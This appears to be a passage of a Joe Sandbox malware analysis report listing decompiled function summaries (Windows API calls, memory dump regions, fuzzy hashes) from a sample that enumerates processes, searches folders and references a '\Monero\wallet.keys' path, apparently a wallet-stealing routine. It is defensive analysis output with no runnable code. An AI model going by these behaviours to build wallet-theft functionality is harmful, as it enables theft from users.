                                        • Instruction Fuzzy Hash: 41310875E11248EBDF14EFE0CD49BEDB7B8BB44700F104559F606AB284EB78AA48CB51
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009905BF), ref: 0098885A
                                        • Process32First.KERNEL32(?,00000128), ref: 0098886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00988883
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • CloseHandle.KERNEL32(?), ref: 009888F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 9da87a87df1f343d1a9a7f25cd21baa537a3120443d2085b45bf0b35abf33ba3
                                        • Instruction ID: cc415988083c17a154b617a02065e1e4c48f81970e54ab4e4685d3c71cf65f98
                                        • Opcode Fuzzy Hash: 9da87a87df1f343d1a9a7f25cd21baa537a3120443d2085b45bf0b35abf33ba3
                                        • Instruction Fuzzy Hash: 66314D71901118EBDB24EF94CD51FEEB778FF85700F50469AF10AA22A0DB386A44CFA1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009EFE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009EFE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 6319bda5ffcb1849669521969156150f8f00c564407d018c83c36a21fafd6d10
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 6E01243220A7A5EEF6362B765CD9A773688EB413B0734433FF216801F2EF515C419280
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00990DE8,00000000,?), ref: 00987B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00990DE8,00000000,?), ref: 00987B54
                                        • wsprintfA.USER32 ref: 00987B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 41181919c3568cb0be141535dedbd49e18a8184d500642cf8d7cd5016d03f191
                                        • Instruction ID: 53ede5a69e1bebe86b5a996d67dc924f75988b88daeb37b570165b2101f0b856
                                        • Opcode Fuzzy Hash: 41181919c3568cb0be141535dedbd49e18a8184d500642cf8d7cd5016d03f191
                                        • Instruction Fuzzy Hash: 7C1127B2909218ABCB14DBC9DD45FBEB7B8FB4DB11F10421AF605A2280E3795940C7B0
                                        APIs
                                        • CreateFileA.KERNEL32(00983D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00983D3E,?), ref: 0098948C
                                        • GetFileSizeEx.KERNEL32(000000FF,00983D3E), ref: 009894A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 009894B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: a957f2e0ec7bb86463f53128b7daeda45cfbba45f9381df270f61ce739ce5f54
                                        • Instruction ID: 1efa2fcb36cacc196ac24b5e4a1f3f061f1ec440d503656aa2e1a60c7dcf10c6
                                        • Opcode Fuzzy Hash: a957f2e0ec7bb86463f53128b7daeda45cfbba45f9381df270f61ce739ce5f54
                                        • Instruction Fuzzy Hash: E8F04F39E04208BBEB10EFB0EC49FAE77B9BB48710F10C654FA15A7290D77496019B80
                                        APIs
                                        • __getptd.LIBCMT ref: 0098CA7E
                                          • Part of subcall function 0098C2A0: __amsg_exit.LIBCMT ref: 0098C2B0
                                        • __getptd.LIBCMT ref: 0098CA95
                                        • __amsg_exit.LIBCMT ref: 0098CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0098CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 829699645a2ae1b7b96e1a27b2a2f63fb875ef443dcb28644fc1deffd4f27af0
                                        • Instruction ID: 2779bf19ea75178b427ed0c2f7ffdcfa665d71d65f9cc27c888e80ac69337f40
                                        • Opcode Fuzzy Hash: 829699645a2ae1b7b96e1a27b2a2f63fb875ef443dcb28644fc1deffd4f27af0
                                        • Instruction Fuzzy Hash: B7F0B4B29443189BD724FBB89803B4E33A0AF80720F15014AF514A73D2CB3859409BA6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: f17cf9adddb26f9b4a614f829d0b37f7f550d57578fe720205c60ed16bd2eed1
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 45415B7190020DAFCF16DF95DC81AAE7BB9BF88304F184159FA04A7252D37599A0DF50
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 009851CA
                                        • lstrcat.KERNEL32(?,00991058), ref: 009851E7
                                        • lstrcat.KERNEL32(?,01818AD8), ref: 009851FB
                                        • lstrcat.KERNEL32(?,0099105C), ref: 0098520D
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984B7C
                                          • Part of subcall function 00984B60: FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                          • Part of subcall function 00984B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                          • Part of subcall function 00984B60: FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: a41a1af592d7a3115ad31fe418bc775d0507a5c4dcdd600edec4bf8d013b9ee7
                                        • Instruction ID: 0ee85ad844be1de2d271a17fa5ff0e717d1cb2442be0e6124165cde7adb3fc02
                                        • Opcode Fuzzy Hash: a41a1af592d7a3115ad31fe418bc775d0507a5c4dcdd600edec4bf8d013b9ee7
                                        • Instruction Fuzzy Hash: 6F21DD7A900208ABDB14FBB0EC46FED333CBBD5300F404555B65956195EFB49ACC8B91